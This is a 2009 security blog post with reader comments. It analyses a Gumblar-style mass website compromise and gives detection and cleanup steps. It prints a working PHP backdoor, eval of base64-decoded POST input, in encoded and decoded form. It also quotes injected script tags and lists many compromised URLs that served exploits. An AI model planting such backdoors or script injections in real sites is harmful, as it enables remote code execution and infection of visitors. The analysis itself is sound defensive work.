msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Revenge of Gumblar Zombies

   23 Oct 09   Filed in Website exploits

Do you remember Gumblar? The massive hacker attack that managed to infect more than a hundred thousand legitimate web sites in a very short time this May? The infection was relatively easy to detect but very hard to completely get rid of. It infected various types of files and created backdoor scripts in inconspicuous places of websites so that hackers could easily restore the malicious content.

The gumblar .cn site (and its immediate successor martuz .cn) had been promptly shut down. As a result,the malicious script injected into hacked websites became harmless for site visitors. However, many webmasters failed to properly clean up their sites after the Gumblar infection, leaving the backdoor scripts intact. It was predicted that hackers would find the way to utilize this army of potentially controllable websites. Now, five months later, we see a new surge of a massive attack that resembles Gumblar in many aspects.

  • Stolen FTP credentials are used to inject malicious content into existing files.
  • Malicious scripts are injected into both HTML code of web pages and into standalone .js files.
  • Backdoor scripts are uploaded to image directories. They have the same names “gifimg.php” and “image.php“. And the rest PHP code is almost the same as it was during the Gumblar stage of the attack.

However, this new modification of the attack has many distinctive features that make it more resilient.

Injected Malicious Scripts

Instead of the infamous obfuscated script, this time hackers inject a tag that loads an external script (I use one script URLs here as an example. There are many others).

<script src=http://melodicsongs .com/ autosuggest/bollywoodthisweek.php ></script>

This script can be usually found right before the <body> tag.

Such an external script is less suspicious than a long unreadable script used by Gumblar.

The same script is injected at the bottom of JavaScript files (.js).

document.write('<script src=http://melodicsongs .com/ autosuggest/bollywoodthisweek.php ><\/script>');

Webmasters usually search for malicious code in HTML files only and forget about .js files since their content is not visible when they use the “View Page Source” command in web browsers.

On some sites, I noticed that hackers intentionally uploaded pre-infected popular scripts (builder.js, effects.js, lightbox.js, prototype.js, scriptaculous.js) and included those .js files in infected web pages. Some webmasters don’t know their sites’ architecture well enough to spot alien scripts, especially when they have such benign names.

Pool of malicious hosts

On different compromised sites this script tag loads the malicious content from different hosts. I currently have a list of 60+ 150 300 750+ URL of malicious scripts located on different servers all around the world.

Moreover, hackers regularly update the injected code and the scipt tag on the same site may contain different src values on different days. This makes the detection more difficult if someone tries to scan files for specific malicious URL.

Another interesting side effect of using multiple malicious servers is the attack draws less attention of security specialists since every new URL may be considered as an independent case (by the way, each URL serves slightly different exploit files).

In case of Gumblar, every hacked site pointed to gumblar .cn. Anti-virus alerts mentioned only gumblar .cn. Security companies had impressive statistics for sites infected with the Gumblar script (60,000 to 200,000 sites). People talked only about Gumblar. Press talked about Gumblar. As a result of this enormous publicity the gumblar .cn domain name had been quickly shut down (the same happened to martuz .cn), which effectively stopped the attack. A single source of the malicious content was the weakest link of Gumblar, its single point of failure.

Now that different hacked sites point to different malicious locations, there is no solid stream of information about the attack. The infection statistics for each URL is not that impressive. Each malicious URL can be found on a relatively small number of sites (100 – 2,000) – not enough to talk about an epidemic. This helps hackers stay under the radar even in the active phase of the attack. Being less prominent means that security companies spend less time fighting the threat. Nonetheless, the overall effect of this attack may be comparable to Gumblar. At this point I detected over 5,000 6,000 unique compromised sites and I don’t think my list is complete.

On the other hand, everyone talks about different URLs and it’s hard to find a common denominator and see the whole picture. Trying to resolve the same issue, webmasters of different sites are searching for information about different malicious URLs. As a result, they can’t find a single source of information and miss usefull posts that don’t mention the particular URL found on their own sites. This makes it harder for webmasters to find relevant information and effectively clean up their sites. As a result the infection time frame increases.

I’ll try to compile all information about this attack here, posting all known malicious URLs so that webmasters of affected sites could find this article regardless of the script modification found on their sites.

Here is a small part of the list. The full list that contains 700+ URLs of Gumblar zombies moved to this page

  1. sarathyplastics .com/ images/gifimg.php
  2. dailylaiken .com/ Image/Index.php
  3. durbin .no/ cv/prices.php
  4. testpagina2.webdesign-idej .nl/ pdf-bestand/nl-home-power.php
  5. quiksilver .dk/ 2009products/shops.php
  6. newcastledistrictcleaning .co.uk/ images/gifimg.php
  7. itillc .com/ DISK1/contactSubmit.php
  8. smtech .in/ board_inc/img2/f7e7/imgInsertImageAlignType_newline.php
  9. download-reactor .com/ SatelliteTV/quicktimepic.php
  10. mesaimeerclub .com/ images/qm19.php
  11. pannatex .com/ test/s20.php
  12. …..

This list is not complete. I’ll try to update it when I find new malicious URLs.

At this point note the distinctive feature of these URLs: they all refer to a PHP script in a sub-directory of a third-party site.

Finding a code that links to websites you don’t know anything about should be suspicious itself, but if you find an external script with a source resembling one of the above URLs, make sure to read the rest of this post.

Zombie websites.

The malicious scripts reside on hacked legitimate websites. This probably is the most innovative feature of this incarnation of the attack. You can’t just shut down the sites or domain names since they belong to legitimate resources. Of course, the sites can be blacklisted (say by Google) but at this point less than 20% of them are listed as suspicious (mainly because of other more old problems).

I’ve never seen hackers placing exploit files directly on hacked websites before. Legitimate websites was only used to silently redirect visitors to sites that belonged to criminals. Sometimes hackers create spammy pages on legitimate websites (either for SEO purpose or to have a cheap non-blacklisted location to link to from their spam emails.) But I don’t remember them serving exploits directly from hacked files. The main reason is probably this sort of activity can be easily detected by owners of compromised sites: traces in logs, significantly increased bandwidth usage, etc. Injected scripts and iframes more convenient to them since they don’t leave any traces in logs and don’t affect bandwidth usage.

So why do they use compromised sites now? Aren’t they afraid to be unmasked? I guess, they don’t. And here’s why:

  • After the Gumblar attack they tracked infected sites for a few months and noticed that many site owners didn’t even try to remove the malicious content. Some of the sites might have been abandoned (but their hosting and domain names are prepaid and they may exist in such an unattended state for some long time), other sites are simply poorly maintained by ignorant webmasters who don’t have the slightest idea about security threats. Now hackers have a pool of sites that they can use without much risk of being quickly unmasked by site owners.
  • At the same time, their new distributed model (using multiple sources of the malicious content at the same time) significantly reduces resource usage on each individual site. Even sites on shared hosting plans can handle the load.
  • And they don’t care if some of their zombie sites gets shut down – they have many more zombies at their disposal. With their botnets of zombie-clients, they can quickly update the malicious code on compromised sites to refer to a new zombie-host.

Very convenient, isn’t it? Hackers no longer have to worry about abuse-proof servers and bandwidth. No need to register hundreds of domain names that become blacklisted very soon. It’s all disposable by nature, so why not have it for free at the expense of webmasters who don’t look after their sites?

All they need is software that can correctly manage this cloud of zombie sites. And it looks like they have it now and we’ll see more attacks that use zombie sites in the future.

Malware

The malicious code on zombie sites is generated on the fly. Every time you reload the PHP page you get a differently obfuscated copy of the same JavaScript. This may prevent detection of the script by AV tools that rely solely on exact matches or check sums.

The malicious code depends on the version of your web browser and your operating systems. You get different code for IE6, IE7, Firefox (didn’t test other browsers). And if you are on Linux you simply get the 404 – not found error. This way hackers try to exploit known vulnerabilities of visitors’ computers.

For example, in all versions of the script they try to load a malicious PDF file if they detect that “PDF.PdfCtrl” or “AcroPDF.PDF” (Adobe Reader or Adobe Acrobat) plugin is installed and the version of the product older than 9.0 but not 8.1.3 (current version is 9.2.0)

Another universal exploit is a Flash file for the “ShockwaveFlash.ShockwaveFlash.9” (Shockwave Flash) plugin if its version is older than 9.124 (current version is 10.0.32.18) As you can see, the malware targets pretty old vulnerabilities that had been fixed about a year ago. I wonder, how many web surfers didn’t bother to upgrade the plugins? It looks like many.

Each zombie site serves slightly modified binaries of the exploits. A week ago the files easily passed the VirusTotal check undetected. Today I checked the same files and the PDF was detected as malicious by 5 out of 41 AV tools and the SWF files were detected by 4 out of 41 AV tools.

In case of IE7, hackers also try to exploit vulnerabilities in “OWC10.Spreadsheet“/”OWC11.Spreadsheet” plugins. It’s Office Web Components. In other words, MS Excel working inside Internet Explorer.

For IE6, they try a VBScript that simply writes a trojan .exe into the Startup folder of the Windows Programs menu. (Do you still use IE6?)

Not only do hackers target different browsers, they also target different countries. On each zombie server i found a binary file of the latest (Oct 1, 2009) MaxMinds GeoLite Country database.

Backdoor scripts

Backdoor scripts are almost identical to those used during the Gumblar stage of the attack.

Scripts with filename “image.php” and “gifimg.php” can be found in images directories of compromised sites.

<?php e val(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

When deobfuscated, the code reads like

if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');

This script executes any PHP code that hackers pass via a POST HTTP request. Hackers like POST requests because unlike GET requests, they don’t leave any information about passed parameters in web server logs. So you can’t detect any suspicious activity when you look through server logs.

In image.php, the code also echoes some predefined string like “36392b39332e3134342e33343a726f6674616d663a4e3669693355363056376132“. Probably they use it to verify that the script is correctly uploaded and is still there.

These two are general purpose backdoor scripts that can be used for any tasks. There is a more specialized script. The following code is injected at the top of some existing PHP files.

<?php eval(base64_decode('aWYoIWlzc2V0KCRueW5oeTEpKXtmdW5jd ... J10pKTs=')); ?>

In this script the base64-encoded string is much longer than in gifimg.php files (I shorten it here to make the code snippet more readable).

This script executes PHP code passed as a POST parameter too, so it can potentially be used for any tasks. But it also defines one interesting function that injects malicious script tags into web pages. The script tags are injected either before the <body> tag, or at the very bottom of files if they contain a substring ‘,a (strange condition, isn’t it?). Before injecting the new tags, this script tries to to remove malicious code of previous attacks (it tries to remove hidden iframes and certain types of scripts.)

Error Pages

On some servers 404 (page not found) and 403 (forbidden) error pages were also infected with malicious script tags.

Stolen FTP credentials

As Gumblar, this attack also uses stolen FTP credentials. This fact was confirmed by security departments of web hosting providers who inspected FTP logs.

Back in May, Gumblar behavior was tested on an intentionally infected Windows computer. The test proved that malware steals passwords saved in FTP programs (FileZilla in that case).

It was also noticed that Gumblar (and this new attack) infects sites that were previously infected with hidden malicious iframes. That iframe injection attack steals FTP credentials from configuration files of 10 popular FTP clients. The fact that Gumblar backdoor scripts tries to remove hidden iframes from HTML files before injecting malicious script tags also suggests some relationship between them. This makes me think that either these two types of hacker attacks are run by the same people, or they share the same database of stolen FTP credentials. They may also use the same password stealing trojans.

Detection

Warning: Loading websites in a web browser with enabled JavaScript may be dangerous.

It’s a good idea to use something like NoScript that only allows script execution from trusted domains. This way, if you see a warning that some script have been blocked on your site, you can be sure that something’s wrong and you should scan files on server for suspicious scripts.

You can also use Unmask Parasites. However, since most of the zombie sites are still not blacklisted by Google, you won’t see warnings. Nonetheless, the malicious scripts will be listed in the External References section and you should be able to spot unknown domain names.

To detect this infection, scan every file on server for script tags that point to strange PHP scripts located in subdirectories of unfamiliar third-party sites. They can be usually found right before the <body> tag. As a webmaster you should know which scripts belong to your site and which don’t.

Make sure to check every .js file. The malicious code starts with “document.write(‘<script src=…” and can be usually found at the very bottom.

Then search for backdoor scripts. Scan the whole directory tree for files with names “gifimg.php” and “image.php“. They can be usually found in “images” directories.

Then search for files that contain the “eval(base64_decode(…))” construction. It is usually used to obfuscate malicious code.

Don’t forget to check custom error pages.

Removal Instructions

  1. Start with your own computer (this is mainly for Windows users).
    1. Scan it for viruses and spyware. Use at least two different AV and anti-spyware tools. (Back in May, MalwareBytes was reported to be able to detect the malware)
    2. Once your computer is clean, make sure your software is up to date (this step helps prevent reinfection of your PC):
      1. Update Windows (This October Microsoft has released security fixes for many critical vulnerabilities)
      2. Use a modern web browser (I suggest FireFox 3.5 with NoScript extension). If you use IE6 – upgrade ASAP!
      3. Upgrade Flash and Adobe Reader – this attack uses vulnerabilities in older versions these plugins. (As of Oct 23, 2009 the current versions of these plugins should be: Flash: 10.0.32.18; Adobe Acrobat/Reader: 9.2.0)
  2. Change all site passwords. Don’t save new passwords in you FTP clients if you don’t want them to be stolen again. Consider using secure protocols (SFTP or FTPS) instead of FTP.
  3. Clean up the site. This hacker attack modifies a lot of files and creates backdoor scripts in inconspicuous locations so it would be very difficult to manually remove malicious content from every infected file. And if you fail to remove even one backdoor script, the risk of reinfection will be high.
    The easiest way is to remove every file on your site and upload a clean copy from a backup (make sure the backup is not infected). Don’t forget about configuration files and custom error pages.
  4. Don’t forget to regularly check your site for security issues.

Credits

I’d like to thank Michael Karr (HostGator) and Patrick Webster (phpBB.com Support Team) for sending me samples of malicious PHP code and some useful information that I wouldn’t be able to get without internal access to compromised websites. Thank you! Your help was indispensable!

Care to comment?

It looks like we have a lot of information about this attack. However I still have many questions. What is the real relationship between Gumblar and the iframe-injection attack? What PHP code is passed to the backdoor scripts? I’d like to see the PHP code of the scripts on the zombie sites (server admins: check if any of them is hosted on your servers). Any additional information is welcome.

Found any inaccuracy or errors in my article? Have a question? Or just want to share your experience? Please leave your comments below or contact me directly.

Similar posts:

  1. Gumblar .cn Exploit – 12 Facts About This Injected Script
  2. List of Gumblar Zombie URLs
  3. Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?
  4. Hidden CN Iframes Are Still Prevalent
  5. 10 FTP Clients Malware Steals Credentials From
  6. All reviewed website exploits

Reader's Comments (50)

  1. |

    [...] 20, 2009 ))- Gumblar… Not Gumby! ( FireEye Malware Intelligence Lab ( October 23, 2009 ))- Revenge of Gumblar Zombies ( Unmask Parasites Blog ( October 23, 2009 [...]

  2. |

    Absolutely an awesome writeup on the evolution of this malicious trend. All details are spot on here from what I have seen coming in from compromised websites. It looks like we haven’t seen the last of Gumblar, and maybe we should also really pay attention to the evolution of this for the future.

    Further steps to prevent the infection of Gumblar/Martuz/nine-ball.
    http://blog.igothacked.com/2009/06/steps-to-prevent-gumblar-martuz-nine.html

  3. |

    [...] Revenge of Gumblar Zombies Gumblar… Not Gumby! [...]

  4. |

    Thanks for the great write-up.
    About one or two weeks ago when I installed a AVG (latest at that time) AVG promptly detected JS downloaders as virus and also alerted with ‘no entry’ on sites containing those script insertion.

    Today I had to format my drive, after that I again installed AVG ( latest as available today), all options enabled, but AVG no longer detects those even in files where I explicitly copy and paste those codes.

    Wondering whats wrong ??

  5. |

    Thanks much for the good post!

  6. |

    [...] This post was mentioned on Twitter by larusalka, Gumblar and Lily Kermit, James Lester. James Lester said: RT @unmaskparasites: [blog] Revenge of Gumblar Zombies http://bit.ly/3VVVLW – analysis of the new incarnation of the Gumblar attack [...]

  7. |

    I’m seeing a lot of websites with this code injected in their pages, but our AV company is not seeing the malicious payload, and I’ve been unable to get decent samples to provide them for further analysis. One sample I got appeared to be corrupted or incomplete.

    How did you obtain the samples to scan with VirusTotal? I’ve been trying to get samples with an unpatched computer, but so far no dice.

    • |

      I’ve deobfuscated their scripts, retrieved the URLs of the exploits and then downloaded binaries. Of course User Agents and referrers are important since they save session information and they detect something fishy they stop serving the malicious content.

      I can send you samples of PDF and SWF files I have.

      • |

        Yes, I’d appreciate the samples. Not sure the best (safest) way for you to get them to me.

        It turns out my AV is now detecting the file I submitted as Bloodhound.PDF.17 (three guesses who I’m using for AV), but I’m not sure how much further they’ve gone into it, as far as other samples. I’d prefer not to wait until our systems are infected before protecting ourselves.

  8. |

    Hi,
    thank you for this information :)
    I have written a little program to remove all infected files from web servers.. if you like I will send you the windows program and source code to offer it here for download.
    Juergen

    • |

      Thank you everyone for all the info. I am one of the recurring victims, detecting the threat ASAP but not knowing if I completely cleaned out (changed all passwords of course).

      I’d really appreciate your program Juergen. Would it be too much to ask to send it over to remador09 at gmail.com ?

      Thank you!

    • |

      please send me the code

    • |

      Juergen, could you send me the code at juanpablo at indigomedia dot com.ar, please?

      thanks in advance,

      Juan

    • |

      Hi Juergen,
      I would appreciate if you can send me the program too. My e-mail address is gpetrov_98 {at} yahoo dot com. Thank you in advance!
      Best regards, Georgi

    • |

      Hi Juergen,

      Can you send me the program too? Many thanks, Nick temp99 [at] clarioncall Dot co Dot uk

    • |

      Hi Juergen,

      Me too please! I thought I cleaned all the .js files out, and the gifimg.php out of my images folders and it came back!!!

      My sites are hosted on Yahoo! And now I have a few sites with this malware crap…

      Your help is greatly appreciated!
      We all have work and family and this takes time to deal with. You are helping people out.
      Thanks!

      william @ designfuel.com

    • |

      Please send also your program to amin.cheng @ gmail.com Thanks.

  9. |

    Great article! I´m not a virus pro, but this article helped me clean up my client´s corporate sites. Thanks a lot.

  10. |

    Here you have some more sites detected today (extra blanks added):

    hxxp://qvevri. ge/Files/wp -rss.php

    hxxp://hast-eg. com/old/vision-contents. php?s=znBeC1ICv&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=znBeC1ICv&id=2

    hxxp://hast-eg. com/old/vision-contents.php?s=zghs1nsY&id=2

    hxxp://hast-eg. com/old/vision-contents. php?s=zghs1nsY&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=aozFXIs&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=aozFXIs&id=2

    hxxp://hast-eg. com/old/vision-contents. php?s=LdyHaxncL&id=3

    hxxp://hast-eg. com/old/vision-contents. php?s=LdyHaxncL&id=2

    Regards,
    Raúl B.

  11. |

    Here are three we found along with the gifimg.php files on our site.

    The urls below were all part of script tags being added to js files and index files primarily.

    nyota-kwa-afrika . de

    dr-mhashim . com

    premiumoriginalprints . com

    • |

      Please post whole URLs of malicious scripts. The site themselves are not malicious. They are just hacked sites. Like yours.

  12. |

    Thank you so much for such an excellent article to help me understand what happened to my site. I still don’t understand how php pages got changed to html with bad code but I do know how to clean the files now.

    This is a very, very useful post. Thank you for taking the time to explain it in such clear language.

    Here is the code I found in all my *.js files and two html files that were php in the original uninfected web:

    hxxp://spektrsec .ru/ images/log.php

  13. |

    I had 2 websites with this file gifimg.php in all the image files. It added script to every web page and changed every js file. I had a clean back up site on my computer and was able to replace all bad files, but I missed one and had to do it all over again the next day. I changed password for management of the site and disabled FTP read/write.
    I resubmited to google to chec out. I had 2 websites from 2 different servers had the same files, but wrote different scripts into each one.

    Thank you for this information on this problem, it now makes sense that all of a sudden my sites were attacked, the Boss site was attack on Nov 11, 2009, we got calls from customers about it.

  14. |

    [...] ———- Gumblar CompromiZed List Unmask Parasitesが Gumblar.Xの陥落サイトリストを更新中です 現時点で 245・・・ [...]

  15. |

    Like Chris, I have also been infected with the PremiumOriginalPrints.com rogue script. It appears inside all WordPress blog posts and 4 static HTML pages on my website. I was notified of this today via Google Webmaster Tools. Here is what the script looks like:

    **End script tag.

    This has caused Google to create a “This site may harm your computer message” for all Firefox users who visit my site. There is a big red warning box labeled “Suspected Attack Site.”

    What can we do to prevent this type of thing from happening? It seems like WP is insecure.

  16. |

    Okay, let’s try the script again:

    BEGIN SCRIPT TAG src=hxxp://premiumoriginalprints .com/ libraries/CREDITS.php END SCRIPT TAG

  17. |

    Here are some other malicious sites I found sitting in my code.

    hxxp:// stylusbrindes.com .br/ css/porta_garrafa.php
    hxxp:// yoboa .com/ art/Baby_Kid.php
    hxxp:// iraqiyoon .net/ images/sag_ani.php
    hxxp:// samed-resort .com/ full/beer.php
    hxxp:// leanqcd .com/ ESW/text20.php
    hxxp:// tcvicogne .be/ includes/ledenlijst.php

  18. |

    It’s important to note that the files are not simply named gifimg.php or image.php anymore, but can be named much of anything. The best method to locate these files is to:
    find . -iname \*.php -size 141c
    If the content of these files is a simple base64_decode string inside of php tags, it’s most likely identical to the gifimg.php pages that are so prevalent.

    Best Regards

  19. |

    Here is a list of malicious sites found in my code:

    letterssite .ru:8080
    onceworld .ru:8080
    sebastiangora-photography .com/ 1ok/pluginmgr.php
    favelinha.com / styles/index.php

  20. |

    Helo; I have a problem with the page, someone injected me with a virus on the What should I do to solve the problem ? please help me

  21. |

    For us it continues. I had missed one base 64 string which undid my original cleaning, but after fixing everything and 100% sure about it, the site was hacked again. All UN and PWs changed and at 0400 this morning. index.php files messed up and all js files new gifimg.php file inserted. Weird thing is, the addition of the gifimg.php file doesnt show up in access logs.

    we’re at our wits end with it. like i said, Usernames and Passwords have all been changed and replaced, distributed over the phone and within hours its all messed up again.

    • |

      >the addition of the gifimg.php file doesnt show up in access logs

      I guess, they are uploaded via FTP so they should be in FTP logs, not in access logs.

      And it is critical to remove the malware that steals passwords. Without it all your efforts are futile.

  22. |

    Thanks for this article – it was really useful to identify what happen to some of my sites.

    I found the infection in 3 areas:
    - on all html pages a script line was placed between the Head and Body tag
    - on all js scripts, a new line was added document.write(”);
    - and on some php files, a new string (just on the top) starting with

    And the classical gifimg.php in all Image folders.

    All linked to hxxp://miamix.extra .hu/ images/ca_fotoalbum.php.

    BTW, I noticed the problem because the RSS feed did not work properly. :-)

  23. |

    hxxp://lakas-elado.extra .hu/ alaprajz/album.php

  24. |

    We have found 2 new backdoor scripts = it looks like they are not just using gifimg.php and image.php anymore:

    beauty-shop-color.php
    VideoPlaylist.php

    just contained the eval backdoor… these files were not found on original backups prior to the attack date of Nov 11 2009

  25. |

    Sorry:

    JS:
    vgallery.extra .hu/ categories/style.php
    case.writeup .co.jp/ images/a5hd/img-osouji.php
    koltaiandor.extra .hu/ portre/nyito_right.php

    HTML:
    koltaiandor.extra .hu/ portre/nyito_right.php

    • |

      Thanks Josh.

      I had to remove the link to your site from your signature since your site is still infected.

      This time link to “uznai-pravdu-ru.1gb .ru/ includes/style.php

      Make sure you followed my removal instructions

  26. |

    A few of my site had this issue just yesterday.

    They are using robots.php as well.

  27. |

    Very interesting article!!
    I´ve one client site´s with this malicious script (the one that end with billeterie.php) and still can´t clean it out. its a pain in the ass!
    And get worst, since there isn´t a clean copy of the site, so the only thing to try (keep trying) is the manually remove.

    Thanks for taking the time to help us with this helpfull guide!

    Regards from argentina.

  28. |

    I faced with this issue. The file with the eval code was the index.php of my joomla default RHUK Milkyway template.
    In addiction to this I found that the password of the admin user was changed, together with its email.

    Thanks you very much for this valuable article.
    Best regards from Italy!!!

  29. |

    Hi

    Your blog – report on Gumblar helped me to understand what is going on..

    My site with 1000′s of pages was ruined…

    I have found that they got the ftp and went through one by one putting code into every joomla site…

    Someone calling himself Alex used the contact for of each one sending this message

    Very Nice Site ! Is this yours too”

    There seems to have been an intrusion in July and it resumed in late December 23 approx

    Here is the code that they place on every joomla site…

    It shows up in the database in 10 location

    user
    sessionplugin
    modules
    acl ora section
    acl ora groups
    acl ora something else
    contact detail
    components ( 17 locations )
    categories

    Here is the code that they use

    I have been banned from Google News as a result of this..

    I can see no cure as the code is too deep in the database..

    CODE FOLLOWS BEWARE

    SELECT *
    FROM `que0927708391162`.`jos_core_acl_aro_sections`
    WHERE (
    `id` LIKE ‘%”Female%’
    OR `value` LIKE ‘%”Female%’
    OR `order_value` LIKE ‘%”Female%’
    OR `name` LIKE ‘%”Female%’
    OR `hidden` LIKE ‘%”Female%’
    )
    OR (
    `id` LIKE ‘%use%’
    OR `value` LIKE ‘%use%’
    OR `order_value` LIKE ‘%use%’
    OR `name` LIKE ‘%use%’
    OR `hidden` LIKE ‘%use%’
    )
    OR (
    `id` LIKE ‘%of%’
    OR `value` LIKE ‘%of%’
    OR `order_value` LIKE ‘%of%’
    OR `name` LIKE ‘%of%’
    OR `hidden` LIKE ‘%of%’
    )
    OR (
    `id` LIKE ‘%viagra”%’
    OR `value` LIKE ‘%viagra”%’
    OR `order_value` LIKE ‘%viagra”%’
    OR `name` LIKE ‘%viagra”%’
    OR `hidden` LIKE ‘%viagra”%’
    )
    LIMIT 0 , 30

    DELETE FROM `que0927708391162`.`jos_categories` WHERE (`id` LIKE ‘%”Female%’ OR `parent_id` LIKE ‘%”Female%’ OR `title` LIKE ‘%”Female%’ OR `name` LIKE ‘%”Female%’ OR `alias` LIKE ‘%”Female%’ OR `image` LIKE ‘%”Female%’ OR `section` LIKE ‘%”Female%’ OR `image_position` LIKE ‘%”Female%’ OR `description` LIKE ‘%”Female%’ OR `published` LIKE ‘%”Female%’ OR `checked_out` LIKE ‘%”Female%’ OR `checked_out_time` LIKE ‘%”Female%’ OR `editor` LIKE ‘%”Female%’ OR `ordering` LIKE ‘%”Female%’ OR `access` LIKE ‘%”Female%’ OR `count` LIKE ‘%”Female%’ OR `params` LIKE ‘%”Female%’) OR (`id` LIKE ‘%use%’ OR `parent_id` LIKE ‘%use%’ OR `title` LIKE ‘%use%’ OR `name` LIKE ‘%use%’ OR `alias` LIKE ‘%use%’ OR `image` LIKE ‘%use%’ OR `section` LIKE ‘%use%’ OR `image_position` LIKE ‘%use%’ OR `description` LIKE ‘%use%’ OR `published` LIKE ‘%use%’ OR `checked_out` LIKE ‘%use%’ OR `checked_out_time` LIKE ‘%use%’ OR `editor` LIKE ‘%use%’ OR `ordering` LIKE ‘%use%’ OR `access` LIKE ‘%use%’ OR `count` LIKE ‘%use%’ OR `params` LIKE ‘%use%’) OR (`id` LIKE ‘%of%’ OR `parent_id` LIKE ‘%of%’ OR `title` LIKE ‘%of%’ OR `name` LIKE ‘%of%’ OR `alias` LIKE ‘%of%’ OR `image` LIKE ‘%of%’ OR `section` LIKE ‘%of%’ OR `image_position` LIKE ‘%of%’ OR `description` LIKE ‘%of%’ OR `published` LIKE ‘%of%’ OR `checked_out` LIKE ‘%of%’ OR `checked_out_time` LIKE ‘%of%’ OR `editor` LIKE ‘%of%’ OR `ordering` LIKE ‘%of%’ OR `access` LIKE ‘%of%’ OR `count` LIKE ‘%of%’ OR `params` LIKE ‘%of%’) OR (`id` LIKE ‘%viagra”%’ OR `parent_id` LIKE ‘%viagra”%’ OR `title` LIKE ‘%viagra”%’ OR `name` LIKE ‘%viagra”%’ OR `alias` LIKE ‘%viagra”%’ OR `image` LIKE ‘%viagra”%’ OR `section` LIKE ‘%viagra”%’ OR `image_position` LIKE ‘%viagra”%’ OR `description` LIKE ‘%viagra”%’ OR `published` LIKE ‘%viagra”%’ OR `checked_out` LIKE ‘%viagra”%’ OR `checked_out_time` LIKE ‘%viagra”%’ OR `editor` LIKE ‘%viagra”%’ OR `ordering` LIKE ‘%viagra”%’ OR `access` LIKE ‘%viagra”%’ OR `count` LIKE ‘%viagra”%’ OR `params` LIKE ‘%viagra”%’)

  30. |

    I had backups of my website which seems to have taken care of the problem, but own laptop seems to still be compromised and I think I’m going to have to format it – I’ve been using AVG and Malware Bytes over and over and it’s fine until I re-enable the internet connection and promptly something downloads new trojan software and the google redirects resume. Something, somewhere, is persistent – but what?

  31. |

    [...] addressing its Javascript obfuscation, the affected domains and its C&C communication[2][3][4]. However, scarce detail is available about the very vulnerabilities and exploits leveraged by [...]

  32. |

    You can use following tools to remove the injection code:
    Windows – FART
    1. download from hxxp://sourceforge.net/projects/fart-it/
    2. run following command:
    fart -r -i -C –remove C:\path_to_file\* “”

    Linux – sed command
    1. Use following command:
    sed -i ‘/injected_code/d’ /path/to/file.htm

  33. |

    This is an excellent write up to a topic that most Joomla administrators could not help me with. I am very very grateful!

  34. |

    Thank you for the excellent summary… I would like to add that where possible, an IP whitelist for FTP access seems like it will effectively prevent this (or stop it from happening again once a site is truly clean, no backdoors etc).

    With a compatible FTP daemon, simply placing one simple .ftpaccess file in the root directory will do the trick:

    (Limit ALL)
    DenyAll
    Allow w.x.y.z
    Allow a.b.c.d
    (/Limit)

    *Replace ( and ) with less than/greater than symbols. Add as many IPs as you need to whitelist, or as few as one.

    In this way, even if the virus has obtained the FTP username and password, it cannot log in unless from an IP on the whitelist.

    I suppose the botnet could learn to spoof IP’s, but this is really just a case of making your site NOT be the “low-hanging fruit”.

    Hope that helps someone…

  35. |

    [...] How to REMOVE Exploits [...]